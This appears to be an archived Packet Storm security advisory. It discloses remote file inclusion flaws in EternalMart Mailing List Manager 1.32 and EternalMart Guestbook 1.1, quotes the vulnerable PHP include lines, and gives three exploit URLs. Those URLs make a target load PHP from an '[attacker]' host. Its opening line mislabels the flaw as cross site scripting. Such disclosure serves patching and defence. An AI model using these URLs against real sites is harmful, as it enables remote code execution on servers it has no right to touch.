EMML version 1.32, or EternalMart Mailing List Manager, and EMGB version 1.1, or EternalMart Guestbook, are both vulnerable to cross site scripting attacks that allow for remote PHP code execution from another site.
850e833f809c4877c234514fd44139518b0302cac84561137c81c6348bc08e0eInformations :
°°°°°°°°°°°°°
Language : PHP
-------------------------------------------------
Produit : EMML (EternalMart Mailing List Manager)
Version : 1.32
-------------------------------------------------
Produit : EMGB (EternalMart Guestbook)
Version : 1.1
-------------------------------------------------
Website : https://www.eternalmart.com
Problem : Include Files
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
EMML :
email_email_func.php :
--------------------------------------------------
include("$emml_path/class.html.mime.mail.php");
--------------------------------------------------
/admin/auth.php :
--------------------------------------------
include("$emml_admin_path/auth_func.php");
--------------------------------------------
EMGB :
/admin/auth.php :
--------------------------------------------
include("$emgb_admin_path/auth_func.php");
--------------------------------------------
Exploits :
°°°°°°°°
EMML :
- https://[target]/admin/auth.php?emml_admin_path=https://[attacker] will
include the file :
https://[attacker]/auth_func.php
- https://[target]/emml_email_func.php?emml_path=https://[attacker] will
include the file :
https://[attacker]/class.html.mime.mail.php
EMGB :
- https://[target]/admin/auth.php?emgb_admin_path=https://[attacker] will
include the file :
https://[attacker]/auth_func.php
More Details/Solution :
°°°°°°°°°°°°°°°°°°°°°
A patch and more details can be found on https://www.phpsecure.info .
frog-m@n
_________________________________________________________________
Hotmail: votre e-mail gratuit ! https://www.fr.msn.be/hotmail
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed